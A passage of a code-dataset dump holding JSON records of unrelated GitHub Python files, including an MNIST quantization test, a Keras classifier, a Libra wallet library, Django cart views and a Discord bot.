None:\n if user_entity_dict is None:\n user_entity_dict = self.USER_ENTITY_DICT\n self.user_entity.__getitem__.side_effect = user_entity_dict.__getitem__\n self.user_entity.__contains__.side_effect = user_entity_dict.__contains__\n","repo_name":"zeshuaro/telegram-pdf-bot","sub_path":"tests/language/test_language_repository.py","file_name":"test_language_repository.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","stars":169,"dataset":"github-code","pt":"34"} +{"seq_id":"1037740920","text":"from __future__ import print_function # only relevant for Python 2\nimport mxnet as mx\nfrom mxnet import nd, gluon, autograd\nfrom mxnet.gluon import nn\nimport nnvm\nimport tvm\nfrom tvm.contrib import graph_runtime\n\n# from quant_utils import *\nimport utils\nimport mrt as 
_mrt\nimport sym_annotate as anno\nimport sym_utils as sutils\nimport sym_pass as spass\nimport sym_calib as calib\nimport sim_quant_helper as sim\nimport gluon_zoo as zoo\n\nimport logging\nimport numpy as np\n\ndef load_fname(version, suffix=None, with_ext=False):\n    suffix = \".\"+suffix if suffix is not None else \"\"\n    if with_ext:\n        return \"./data/mnist%s%s.json\"%(version, suffix), \\\n            \"./data/mnist%s%s.params\"%(version, suffix), \\\n            \"./data/mnist%s%s.ext\"%(version, suffix)\n    else:\n        return \"./data/mnist%s%s.json\"%(version, suffix), \\\n            \"./data/mnist%s%s.params\"%(version, suffix)\n\ndef data_xform(data):\n    \"\"\"Move channel axis to the beginning, cast to float32, and normalize to [0, 1].\"\"\"\n    return nd.moveaxis(data, 2, 0).astype('float32') / 255\n\ntrain_data = mx.gluon.data.vision.MNIST(train=True).transform_first(data_xform)\nval_data = mx.gluon.data.vision.MNIST(train=False).transform_first(data_xform)\n\nbatch_size = 1\ntrain_loader = mx.gluon.data.DataLoader(train_data, shuffle=True, batch_size=batch_size)\nval_loader = mx.gluon.data.DataLoader(val_data, shuffle=False, batch_size=batch_size)\n\nversion = 'lenet'\nctx = mx.gpu(2)\ndef train_mnist():\n    # Select a fixed random seed for reproducibility\n    mx.random.seed(42)\n\n    if version == '':\n        net = nn.HybridSequential(prefix='DApp_')\n        with net.name_scope():\n            net.add(\n                nn.Conv2D(channels=16, kernel_size=(3, 3), activation='relu'),\n                nn.MaxPool2D(pool_size=(2, 2), strides=(1, 1)),\n                nn.Conv2D(channels=32, kernel_size=(3, 3), activation='relu'),\n                nn.MaxPool2D(pool_size=(2, 2), strides=(1, 1)),\n                nn.Conv2D(channels=64, kernel_size=(3, 3), activation='relu'),\n                nn.MaxPool2D(pool_size=(2, 2), strides=(2, 2)),\n                nn.Conv2D(channels=128, kernel_size=(1, 1), activation='relu'),\n                nn.MaxPool2D(pool_size=(2, 2), strides=(2, 2)),\n                nn.Flatten(),\n                nn.Dense(10, activation=None),\n            )\n    elif version == 'lenet':\n        net = nn.HybridSequential(prefix='LeNet_')\n        with net.name_scope():\n            net.add(\n                nn.Conv2D(channels=20, kernel_size=(5, 5), activation='relu'),\n                nn.MaxPool2D(pool_size=(2, 2), strides=(2, 2)),\n                nn.Conv2D(channels=50, kernel_size=(5, 5), activation='relu'),\n                nn.MaxPool2D(pool_size=(2, 2), strides=(2, 2)),\n                nn.Flatten(),\n                nn.Dense(500, activation='relu'),\n                nn.Dense(10, activation=None),\n            )\n    elif version == 'mlp':\n        net = nn.HybridSequential(prefix='MLP_')\n        with net.name_scope():\n            net.add(\n                nn.Flatten(),\n                nn.Dense(128, activation='relu'),\n                nn.Dense(64, activation='relu'),\n                nn.Dense(10, activation=None) # loss function includes softmax already, see below\n            )\n\n    net.initialize(mx.init.Xavier(), ctx=ctx)\n    net.summary(nd.zeros((1, 1, 28, 28), ctx=ctx))\n\n    trainer = gluon.Trainer(\n\tparams=net.collect_params(),\n\toptimizer='adam',\n\toptimizer_params={'learning_rate': 1e-3},\n    )\n    metric = mx.metric.Accuracy()\n    loss_function = gluon.loss.SoftmaxCrossEntropyLoss()\n    num_epochs = 10\n\n    for epoch in range(num_epochs):\n        for inputs, labels in train_loader:\n            inputs = inputs.as_in_context(ctx)\n            labels = labels.as_in_context(ctx)\n\n            with autograd.record():\n                outputs = net(inputs)\n                loss = loss_function(outputs, labels)\n\n            loss.backward()\n            metric.update(labels, outputs)\n\n            trainer.step(batch_size=inputs.shape[0])\n\n        name, acc = metric.get()\n        print('After epoch {}: {} = {:5.2%}'.format(epoch + 1, name, acc))\n        metric.reset()\n\n    for inputs, labels in val_loader:\n        inputs = inputs.as_in_context(ctx)\n        labels = labels.as_in_context(ctx)\n        metric.update(labels, net(inputs))\n    print('Validation: {} = 
{}'.format(*metric.get()))\n    assert metric.get()[1] > 0.96\n\n    sym = net(mx.sym.var('data'))\n    sym_file, param_file = load_fname(version)\n    open(sym_file, \"w\").write(sym.tojson())\n    net.collect_params().save(param_file)\n\ndef test_sym_pass(iter_num=10):\n    inputs_ext = { 'data': {\n        'shape': (batch_size, 1, 28, 28),\n    } }\n    inputs = [mx.sym.var(n) for n in inputs_ext]\n\n    data_iter = iter(val_loader)\n    def data_iter_func():\n        return next(data_iter)\n    data, _ = data_iter_func()\n\n    net1 = utils.load_model(*load_fname(version), inputs, ctx=ctx)\n    def graph_func(data):\n        return net1.forward(data.as_in_context(ctx))\n\n    sym_file, param_file = load_fname(version)\n    sym, params = mx.sym.load(sym_file), nd.load(param_file)\n    sym, params = spass.sym_quant_prepare(sym, params, inputs_ext)\n    if True:\n        mrt = _mrt.MRT(sym, params, inputs_ext)\n        mrt.set_data('data', data)\n        mrt.calibrate(ctx=ctx)\n        mrt.set_output_prec(8)\n        qsym, qparams, inputs_ext = mrt.quantize()\n    else:\n        inputs_ext['data']['data'] = data\n        th_dict = calib.sym_calibrate(sym, params, inputs_ext, ctx=ctx)\n        qsym, qparams, precs, _ = calib.sym_simulate(sym, params, inputs_ext, th_dict)\n        qsym, qparams = calib.sym_realize(qsym, qparams, inputs_ext, precs, \"cvm\")\n    dump_sym, dump_params, dump_ext = load_fname(version, \"sym.quantize\", True)\n    sim.save_ext(dump_ext, inputs_ext)\n    nd.save(dump_params, qparams)\n    open(dump_sym, \"w\").write(qsym.tojson())\n\n    dump_sym, dump_params, dump_ext = load_fname(version, \"sym.quantize\", True)\n    (inputs_ext,) = sim.load_ext(dump_ext)\n    inputs = [mx.sym.var(n) for n in inputs_ext]\n    net2 = utils.load_model(dump_sym, dump_params, inputs, ctx=ctx)\n    def cvm_quantize(data):\n        data = sim.load_real_data(data, 'data', inputs_ext)\n        return net2.forward(data.as_in_context(ctx))\n\n    utils.multi_eval_accuracy(graph_func, data_iter_func,\n            cvm_quantize,\n            iter_num=iter_num)\n\ndef test_nnvm_pass(iter_num=10):\n    logger = logging.getLogger(\"log.test.nnvm\")\n    logger.info(\"=== Log Test NNVM ===\")\n\n    dump_sym, dump_params, dump_ext = load_fname(version, \"sym.quantize\", True)\n    sym, params = mx.sym.load(dump_sym), nd.load(dump_params)\n    (inputs_ext,) = sim.load_ext(dump_ext)\n    data_iter = iter(val_loader)\n    data, _ = next(data_iter)\n    _mrt.std_dump(sym, params, inputs_ext, data, \"cvm_mnist\")\n\nprint (\"Test mnist\", version)\n# train_mnist()\nutils.log_init()\ntest_sym_pass(1000)\n# test_nnvm_pass(10)\n","repo_name":"CortexFoundation/tvm-cvm","sub_path":"cvm/tests/test_mnist.py","file_name":"test_mnist.py","file_ext":"py","file_size_in_byte":6919,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"34"}
+{"seq_id":"8398947446","text":"from PIL import Image\r\nimport numpy as np\r\nimport os\r\nimport cv2\r\n\r\ndef align_head_to_body(joined,output_path):\r\n    # Read the input image\r\n    img = Image.open(joined)  # open the image passed in, rather than a hardcoded file name\r\n\r\n    # Convert the image into a numpy array\r\n    img_array = np.array(img)\r\n\r\n    # Detect the head region using HoughCircles method of OpenCV\r\n    img_gray = cv2.cvtColor(img_array, cv2.COLOR_RGB2GRAY)\r\n    circles = cv2.HoughCircles(img_gray, cv2.HOUGH_GRADIENT, dp=1, minDist=100,\r\n                               param1=50, param2=30, minRadius=50, maxRadius=150)\r\n    head_cx, head_cy, head_r = circles[0][0]\r\n\r\n    # Define the body region as the remaining part of the image\r\n    body_left = 0\r\n    body_top = int(head_cy + head_r)\r\n    body_right = img.width\r\n    body_bottom = img.height\r\n\r\n\r\n    # Crop the head and body regions from the image\r\n    head_img = img.crop((head_cx - head_r, head_cy - head_r, head_cx + head_r, head_cy + head_r))\r\n    body_img = img.crop((body_left, body_top, body_right, body_bottom))\r\n\r\n    # Calculate the offset to align the head to the center of the body\r\n    offset_x = int((body_right - body_left - 2 * head_r) / 2)\r\n    offset_y = int(head_r)\r\n\r\n    # Create a new image with the aligned head and body regions\r\n    new_img = Image.new(\"RGBA\", (img.width, img.height), (0, 0, 0, 0))\r\n    new_img.paste(body_img, (0, 0))\r\n    new_img.paste(head_img, (offset_x, offset_y), mask=head_img)\r\n\r\n    # Save the final image to the output path\r\n    new_img.save(output_path)  # use the argument, not the string literal 'output_path'\r\n","repo_name":"ifaizanahmed9/Manipulating-images-using-python","sub_path":"align_head_to_body.py","file_name":"align_head_to_body.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"}
+{"seq_id":"40128675663","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nfrom flask import Flask\nfrom flask import request, jsonify\nfrom keras.models import Sequential\nfrom flask_restful import Api, Resource, reqparse\nfrom keras.layers import Dense\nfrom keras.optimizers import Adam\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\nimport pandas as pd\nimport joblib\nfrom flask_restful import Resource\n\n\ndef model_f(X,Y):\n    \n    X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=0.2, random_state=0)\n    model = Sequential()\n    model.add(Dense(10, input_shape=(1,), activation='relu'))\n    model.add(Dense(8, activation='relu'))\n    model.add(Dense(6, activation='relu'))\n    model.add(Dense(3, activation='softmax'))\n    model.compile(Adam(lr=0.001), 'categorical_crossentropy', metrics=['accuracy'])\n    \n    model.fit(X_train, y_train, epochs=1)\n    \n    return model\n\nif __name__ == '__main__':\n    \n    inner = pd.read_csv('data/Faulty_inner.csv')\n    outer = pd.read_csv('data/Faulty_outer.csv')\n    healthy = pd.read_csv('data/healthy.csv')\n    \n    pd.DataFrame(healthy)\n    pd.DataFrame(outer)\n    pd.DataFrame(inner)\n    \n    merge = pd.merge(inner, outer, how=\"outer\")\n    dataset = pd.merge(merge, healthy, how=\"outer\")\n    \n    X = dataset.Vibration\n    x_norm = (X - np.min(X))/(np.max(X)-np.min(X))\n    X = x_norm\n    \n    \n\n    Y = pd.get_dummies(dataset.Condition)\n    Y = Y.values\n    \n    mdl = model_f(X,Y)\n    \n    mdl.save('my_model.h5')  # indented into the __main__ guard so importing this module does not raise NameError\n\n","repo_name":"eziomentor/project_1","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
+{"seq_id":"14526799722","text":"from canoser import Uint16\r\nfrom mnemonic import Mnemonic\r\nimport libra\r\nfrom libra_client.key_factory import KeyFactory\r\nfrom libra.account_address import HEX_ADDRESS_LENGTH\r\n\r\nMAX_CHILD_COUNT = Uint16.max_value\r\n\r\n\r\nclass WalletLibrary:\r\n\r\n    DELIMITER = \";\"\r\n\r\n    def __init__(self, mnemonic, seed, key_factory, child_count, rotate_keys={}):\r\n        self.mnemonic = mnemonic\r\n        self.seed = seed\r\n        self.key_factory = key_factory\r\n        self.child_count = child_count\r\n        self.rotate_keys = rotate_keys\r\n        self.accounts = []\r\n        if child_count > 0:\r\n            self._recover_accounts()\r\n        for ik, iv in self.rotate_keys.items():\r\n            # TODO: check rotate key\r\n            privkey = self.accounts[iv].private_key\r\n            address = self.accounts[ik].address\r\n            self.accounts[ik] = libra.Account(privkey, address=address)\r\n        # print(\"rotate_keys:\", rotate_keys)\r\n\r\n    def json_print_fields(self):\r\n        
return [\"mnemonic\", \"seed\", \"child_count\", \"accounts.address\"]\r\n\r\n def find_account_by_address_hex(self, address):\r\n for index, account in enumerate(self.accounts):\r\n if account.address.hex() == address:\r\n return (index, account)\r\n return (None, None)\r\n\r\n def find_account_by_publickey_hex(self, pubkey):\r\n for index, account in enumerate(self.accounts):\r\n if account.public_key.hex() == pubkey:\r\n return (index, account)\r\n return (None, None)\r\n\r\n def rotate_key(self, to_rotate_id, master_id):\r\n to_rotate_id = Uint16.int_safe(str(to_rotate_id))\r\n master_id = Uint16.int_safe(str(master_id))\r\n self.rotate_keys[to_rotate_id] = master_id\r\n\r\n def _recover_accounts(self):\r\n for idx in range(self.child_count):\r\n self._add_account(idx)\r\n\r\n def _add_account(self, account_idx):\r\n privkey = self.key_factory.private_child(account_idx)\r\n account = libra.Account(privkey)\r\n self.accounts.append(account)\r\n return account\r\n\r\n def new_account(self):\r\n child_index = self.child_count\r\n self.child_count += 1\r\n return self._add_account(child_index)\r\n\r\n @classmethod\r\n def new(cls):\r\n m = Mnemonic(\"english\")\r\n mnemonic = m.generate(192)\r\n return cls.new_from_mnemonic(mnemonic)\r\n\r\n @classmethod\r\n def new_from_mnemonic(cls, mnemonic, child_count=0, rotate_keys={}):\r\n seed = KeyFactory.to_seed(mnemonic)\r\n key_factory = KeyFactory(seed)\r\n return cls(mnemonic, seed, key_factory, child_count, rotate_keys)\r\n\r\n @classmethod\r\n def recover(cls, filename):\r\n with open(filename) as f:\r\n data = f.read()\r\n arr = data.split(WalletLibrary.DELIMITER)\r\n try:\r\n rotate_keys = cls.recover_rotate_pairs(filename)\r\n except FileNotFoundError:\r\n rotate_keys = {}\r\n return cls.new_from_mnemonic(arr[0], Uint16.int_safe(arr[1]), rotate_keys)\r\n\r\n @classmethod\r\n def recover_rotate_pairs(cls, filename):\r\n rotate_keys = {}\r\n with open(filename + \".rotate\") as f:\r\n data = f.read()\r\n arr = data.split(WalletLibrary.DELIMITER)\r\n if arr[-1] == '':\r\n arr = arr[0:-1]\r\n for pair in arr:\r\n arr2 = pair.split(\",\")\r\n if len(arr2) != 2:\r\n raise ValueError(\"rotate file format error.\")\r\n rotate_keys[Uint16.int_safe(arr2[0])] = Uint16.int_safe(arr2[1])\r\n return rotate_keys\r\n\r\n def write_recovery(self, filename):\r\n with open(filename, 'wt') as f:\r\n f.write(self.mnemonic)\r\n f.write(WalletLibrary.DELIMITER)\r\n f.write(str(self.child_count))\r\n self.write_recovery_rotate(filename)\r\n\r\n def write_recovery_rotate(self, filename):\r\n with open(filename + \".rotate\", 'wt') as f:\r\n for k, v in self.rotate_keys.items():\r\n f.write(str(k))\r\n f.write(\",\")\r\n f.write(str(v))\r\n f.write(WalletLibrary.DELIMITER)\r\n\r\n def get_account_by_address_or_refid(self, address_or_refid):\r\n slen = len(address_or_refid)\r\n if slen > HEX_ADDRESS_LENGTH or (slen < HEX_ADDRESS_LENGTH and slen > len(str(MAX_CHILD_COUNT))):\r\n raise ValueError(f\"address:{address_or_refid} is not valid.\")\r\n if slen == HEX_ADDRESS_LENGTH:\r\n _i, account = self.find_account_by_address_hex(address_or_refid)\r\n if account is None:\r\n raise ValueError(f\"account:{address_or_refid} not in wallet.\")\r\n return account\r\n else:\r\n idx = Uint16.int_safe(address_or_refid)\r\n if idx >= 0 and idx < self.child_count:\r\n return self.accounts[idx]\r\n else:\r\n raise ValueError(f\"account index {idx} out of 
range:{self.child_count}\")\r\n","repo_name":"yuan-xy/libra-client","sub_path":"libra_client/wallet_library.py","file_name":"wallet_library.py","file_ext":"py","file_size_in_byte":4978,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"34"} +{"seq_id":"17933488219","text":"from dingtest import dingTalk\nfrom read_excel import read_excel,convert\n\ntask = read_excel()\t\n\nconcrete1 = '中班'\nMobile1 = convert(concrete1,task)\natall = False\ncontent_txt1 = '陈富贵提醒您:确认排错表是否有未复核检验数据'\ndingTalk(content_txt1,Mobile1,atall)\n\n","repo_name":"xuysang/learn_python","sub_path":"编程/python/基础代码/定点提醒/中班排错表.py","file_name":"中班排错表.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"40634457401","text":"\"\"\"\nDepends: cron (pip install cron.py)\nuse cron to run the \"CountFrequentyID\" hourly or daily\na time marker is printed everytime\n\"\"\"\nimport time\nimport cron\nimport datetime\nfrom CountFrequentID import *\nfrom datetime import datetime\n\nfrequency = 'hourly' # the running frequency of \"CountFrequentID.py\"\n\ndef PrintTime():\n print (\"The job is done at: \", str(datetime.now()))\n\nif frequency == 'hourly':\n job = cron.Cron()\n job.add('0 */1 * * *', PrintTime)\n job.add('0 */1 * * *', CountFrequentyID, Board, Browser,\n TopN, Today, Year, Month, Day, RecentMonth)\nelif frequency == 'daily':\n job = cron.Cron()\n job.add('0 0 */1 * *', PrintTime)\n job.add('0 0 */1 * *', CountFrequentyID, Board, Browser,\n TopN, Today, Year, Month, Day, RecentMonth)\n\n\njob.start()\n\n# if you want to stop the job, type \"job.stop()\" in the command line\n# and hit \"Enter\"\n","repo_name":"shanshanlaiche/Mitbbs_CountFrequentID","sub_path":"CountFrequentID_Cron.py","file_name":"CountFrequentID_Cron.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"33744724622","text":"from django.contrib.auth.forms import UserCreationForm\nfrom django.urls import reverse_lazy,reverse\nfrom django.views import generic\nfrom .utils import cartData\nfrom django.shortcuts import render,redirect\nfrom .models import *\nfrom django.http import HttpResponseRedirect\n\nclass SignUpView(generic.CreateView):\n form_class = UserCreationForm\n success_url = reverse_lazy('login')\n template_name = 'registration/signup.html'\n\ndef home(request):\n data = cartData(request)\n cartItem = data['cartItems']\n \n product = Product.objects.all()\n context = {'products':product,'cartItem':cartItem}\n return render(request,'home.html',context)\n\ndef cart(request):\n data = cartData(request)\n cartItem = data['cartItems']\n order = data['order']\n items = data['items']\n print(items)\n total = order.get_cart_items * order.get_cart_total\n\n context = {'items':items,'order':order,'cartItem':cartItem,'total':total}\n return render(request,'cart.html',context)\n\ndef add_to_cart(request,id):\n if request.method == \"POST\":\n customer = request.user.customer\n \n product = Product.objects.get(id=id)\n \n order, created = Order.objects.get_or_create(customer=customer, complete=False)\n\n orderItem, created = OrderItem.objects.get_or_create(order=order, product=product)\n orderItem.quantity = orderItem.quantity + 1\n\n orderItem.save()\n\n\n # if orderItem.quantity <= 0:\n # orderItem.delete()\n\n return HttpResponseRedirect('/')\n\n \n\ndef cart(request):\n user=request.user\n customer,created = 
Customer.objects.get_or_create(user=user)\n\n order, created = Order.objects.get_or_create(customer=customer, complete=False)\n items = order.orderitem_set.all()\n cartItems = order.get_cart_items\n\n context = {\n 'items':items,\n 'order':order,\n 'cartItem':cartItems\n }\n print(items,cartItems,order)\n return render(request,'cart.html',context)\n\ndef increaseItem(request,id):\n user= request.user\n item = OrderItem.objects.get(id=id)\n item.quantity += 1\n item.save()\n print(item.quantity)\n\n return HttpResponseRedirect(reverse(\"cart\"))\n\ndef decreaseitem(request,id):\n user= request.user\n item = OrderItem.objects.get(id=id)\n item.quantity -= 1\n item.save()\n if item.quantity <= 0:\n item.delete()\n print(item)\n\n return HttpResponseRedirect(reverse(\"cart\"))","repo_name":"ashiljacob/ecom_task","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"28128061074","text":"import sys\n# input = sys.stdin.readline\nsys.stdin = open('input_13458.txt')\n\n'''\n143644KB / 884ms 뭐야 왜 이렇게 거대해?\n143644KB / 788ms\n'''\n\nT = int(input())\nfor t in range(1, T+1):\n N = int(input())\n A = list(map(int, input().split()))\n B, C = map(int, input().split())\n supervisor = 0\n\n for i in range(N):\n temp = A[i] - B # 변수로 받아줘서 최대한 줄여보려 함\n if temp <= 0:\n supervisor += 1\n else:\n if temp % C:\n supervisor += (temp // C) + 2\n else:\n supervisor += (temp // C) + 1\n\n print(supervisor)","repo_name":"sungyeon-0975/algo_study","sub_path":"210909/13458_yoon.py","file_name":"13458_yoon.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"19189554266","text":"import os\nimport utils\n\n\ndef read(directory: str):\n states, energies = [], []\n for traj_index in sorted(os.listdir(directory)):\n os.chdir(directory + \"/\" + traj_index)\n\n for traj_name in sorted(os.listdir()):\n if any(map(str.isdigit, traj_name)):\n # Read locations to states\n lis = list(map(int, traj_name.split(\"_\")[1:-1]))\n state = utils.loc2state(lis)\n states.append(state)\n # Read energies\n os.chdir(traj_name)\n curve_filename = [filename for filename in os.listdir() if filename.startswith(\"curve\")][0]\n _, _, energy = utils.read_curve(curve_filename)\n energies.append(energy)\n os.chdir(\"..\")\n os.chdir('../../../..')\n return states, energies\n\n\ndef read_all(dir_list):\n states_all, energies_all = [], []\n for directory in dir_list:\n states, energies = read(directory)\n states_all.extend(states)\n energies_all.extend(energies)\n return states_all, energies_all\n\n\n\n\n","repo_name":"BOWENmeZHENG/go_rl","sub_path":"data_process.py","file_name":"data_process.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9731769767","text":"\"\"\"\r\nMIT LICENCE 2020 - 2021\r\nAll the code and the full bot is nothing but TheImperialGod\r\nAll the code is made by NightZan999, check him out at https://github.com/NightZan999\r\nThe deposit and withdraw command have been added on to by Makiyu-py, he used it in a fork\r\nThe repository the code has been taken from is at https://github.com/NightZan999/TheImperialGod\r\n\r\nBe sure to have this in your project at the beginning!\r\n\"\"\"\r\nimport discord #discord object\r\nfrom discord.ext import commands, tasks #commands from 
external\r\nimport random #random\r\nimport json\r\nimport os\r\nimport asyncio\r\n\r\ndef load_cogs(): #loading all our cogs\r\n cogs = [\r\n \"cogs.info.help\", # help command\r\n \"cogs.fun.animals\", # searching reddit\r\n \"cogs.economy.bankcommands\", # bank commands in economy\r\n \"cogs.economy.moneymaking\", # moneymaking commands in economy\r\n \"cogs.economy.shop\", # making a shop with database in economy!\r\n \"cogs.economy.gambling\", # gambling commands\r\n \"cogs.fun.misc\", # misc commands\r\n \"cogs.fun.utils\", # utilities\r\n \"cogs.info.info\", # information\r\n \"cogs.info.math\", # math commands\r\n \"cogs.moderation.giveaways\", # giveaway commands!\r\n \"cogs.moderation.mod\", # moderation commands\r\n \"cogs.owner.owner\", # owner commands\r\n \"cogs.tickets.tickets\", # ticket commands\r\n \"cogs.info.topgg\", # has top.gg stuff bois!\r\n \"cogs.exclusive.exclusive\", # has exclusive commands\r\n \"cogs.moderation.autorole\", # autoroles\r\n \"cogs.music.music\", # music :D\r\n \"cogs.info.minecraft\", # minecraft commands\r\n \"cogs.points.points\", # points\r\n \"cogs.owner.patch\" # patching stuff\r\n ]\r\n \r\n for cog in cogs:\r\n client.load_extension(cog)\r\n\r\n events = [\r\n \"events.GuildEvents\", # when the bot leaves or joins a guild!\r\n \"events.ReactionAdd\",\r\n \"events.ReactionRemove\",\r\n \"events.OnCommand\",\r\n \"cogs.points.pointevents\"\r\n ]\r\n\r\n for event in events:\r\n client.load_extension(event)\r\n print(\"===============================\")\r\n print(f\"{len(cogs)} cogs are loaded\\n{len(events)} events are loaded\") \r\n # now load jishaku\r\n client.load_extension(\"jishaku\")\r\n print(\"Jishaku has been loaded!\\n===============================\")\r\n\r\nwith open(\"config.json\", \"r\") as f:\r\n config = json.load(f)\r\n\r\n#consts\r\nBOT_TOKEN = config[\"token\"]\r\nCLIENT_ID = config[\"clientId\"]\r\nCLIENT_SECRET = config[\"clientSecret\"]\r\nPUBLIC_KEY = config[\"publicKey\"]\r\nBOT_PREFIX = config[\"prefix\"]\r\nnew_link =\"https://discordapp.com/oauth2/authorize?&client_id=\".join(str(CLIENT_ID))\r\nnew_link.join(\"&scope=bot&permissions=21474836398\")\r\n\r\n# custom client\r\nclass TheImperialGod(commands.Bot):\r\n def __init__(self, *args, **kwargs):\r\n super().__init__(*args, **kwargs)\r\n\r\n async def on_ready(self):\r\n print(\"Ready!\")\r\n print(\"Username: \", client.user.name)\r\n print(\"User ID: \", client.user.id)\r\n print(\"----------------------------\")\r\n\r\n async def get_cogs(self):\r\n return cogs\r\n \r\n async def get_events(self):\r\n return events\r\n \r\n async def get_all_emojis(self):\r\n return Emojis\r\n \r\n async def read_json(self, filename):\r\n with open(filename, \"r\") as f:\r\n data = json.load(f)\r\n return data\r\n \r\n async def write_json(self, output, filename):\r\n with open(filename, \"w\") as f:\r\n return json.dump(output, f)\r\n\r\nintents = discord.Intents.all()\r\nclient = TheImperialGod(command_prefix = ['imp ', 'Imp ', 'iMp ', 'IMp ', 'imP ', 'ImP ', 'iMP ', 'IMP '], case_insensitive = True, intents = intents, allowed_mentions = discord.AllowedMentions(everyone = False, users = True, roles = True, replied_user = True)) #making a client object\r\n\r\nasync def ch_pr(): #changing the bots status every 5 secs!!!\r\n await client.wait_until_ready()\r\n while not client.is_closed():\r\n statuses = [\r\n f\"The Protection of {len(client.guilds)} servers\",\r\n \"imp help | imp support 😋\"\r\n ]\r\n status = random.choice(statuses)\r\n await 
client.change_presence(activity = discord.Streaming(name = status, url = \"https://twitch.tv/pewdiepie\"))\r\n        await asyncio.sleep(10)\r\n\r\n@client.event\r\nasync def on_message(message):\r\n    try:\r\n        if message.content == \"<@!768695035092271124>\":\r\n            em = discord.Embed(title = \"Help for TheImperialGod\", color = message.author.color,\r\n            description = \"Check some information about me!\")\r\n            em.set_author(name = client.user.name, icon_url = client.user.avatar_url)\r\n            em.add_field(name = \"What can I do?\", value = \"I can make your server so charming! Whether you are a moderator or not!\")\r\n            em.add_field(name = \"Commands:\", value = \"Check out `imp help` for a list of my commands\")\r\n            em.add_field(name = \"Prefix:\", value = \"My prefix is `imp`\")\r\n            em.add_field(name = \"Command Types\", value = \"Economy, Moderation, Information, Utilities, Math, Fun, Giveaways, Tickets, Miscellaneous\")\r\n            em.add_field(name = \"Website:\", value = \"[Click Here](https://nightzan.ml/projects/theimperialgod/index.html)\")\r\n            em.set_footer(text = \"© TheImperialGod™ v1.5.1\",icon_url = client.user.avatar_url)\r\n            em.set_thumbnail(url = message.author.avatar_url)\r\n            await message.channel.send(embed = em)\r\n    except:\r\n        pass\r\n\r\n    await client.process_commands(message)\r\n\r\n\r\nload_cogs()\r\nclient.loop.create_task(ch_pr())\r\nclient.run(BOT_TOKEN)\r\n","repo_name":"Frayer229/imperialgod1","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":5633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
+{"seq_id":"20764906","text":"from wagtail import blocks\nfrom .conditional_block import ConditionalBlock\n\n\nclass BaseFieldBlock(blocks.StructBlock):\n\n    label = blocks.CharBlock(\n        max_length=255,\n        required=True,\n        help_text='The label of the form field.'\n    )\n\n    required = blocks.BooleanBlock(\n        default=False,\n        required=False,\n        help_text='Tick this box to make this a required field.'\n    )\n\n    display_checkbox_label = blocks.BooleanBlock(\n        default=False,\n        required=False,\n        help_text='Do you want the checkbox label to display? If not you should populate help_text.'\n    )\n\n    choices = blocks.ListBlock(\n        blocks.TextBlock(\n            required=False,\n        ),\n    )\n\n    empty_label = blocks.CharBlock(\n        max_length=255,\n        required=False,\n    )\n\n    max_length = blocks.IntegerBlock(\n        required=False,\n        help_text='Set a maximum length for this field. e.g. 
100'\n )\n\n default_value = blocks.CharBlock(\n max_length=255,\n required=False,\n help_text='Set a default value for this field.'\n )\n\n # placeholder = blocks.CharBlock(\n # max_length=255,\n # required=False,\n # help_text='Set a placeholder for the field.'\n # )\n\n help_text = blocks.CharBlock(\n max_length=255,\n required=False,\n help_text='Text to assist the user in populating this field.'\n )\n\n html = blocks.RichTextBlock(\n required=False,\n )\n\n display_side_by_side = blocks.BooleanBlock(\n help_text='Display these items side by side?',\n required=False,\n )\n\n rules = ConditionalBlock(\n required=False,\n help_text='Add conditional rules to show or hide fields depending on the value of other fields in the form.'\n )\n","repo_name":"octavenz/wagtail-advanced-form-builder","sub_path":"wagtail_advanced_form_builder/blocks/fields/base_field_block.py","file_name":"base_field_block.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"34"} +{"seq_id":"24027236772","text":"from reggy.samples.tokens import Target\nfrom reggy.samples.tokens.regex_extra_info import RegexExtraInfo\n\nregex_info_to_tok = {\n\n 'Java' : Target.JAVA,\n 'Perl' : Target.PERL,\n 'POSIX' : Target.POSIX,\n 'egrep' : Target.POSIX,\n 'Python' : Target.PYTHON,\n 'JavaScript' : Target.JAVASCRIPT,\n 'PHP' : Target.PHP,\n 'Golang' : Target.GOLANG,\n 'Rust' : Target.RUST,\n 'C#' : Target.CSHARP,\n 'Scala' : Target.SCALA,\n 'Kotlin' : Target.KOTLIN,\n\n 'Anywhere' : RegexExtraInfo.ANYWHERE,\n 'Start of text': RegexExtraInfo.START_OF_TEXT,\n 'Start of line': RegexExtraInfo.START_OF_LINE,\n 'Start of word': RegexExtraInfo.START_OF_WORD,\n\n 'End of text' : RegexExtraInfo.END_OF_TEXT,\n 'End of line' : RegexExtraInfo.END_OF_LINE,\n 'End of word' : 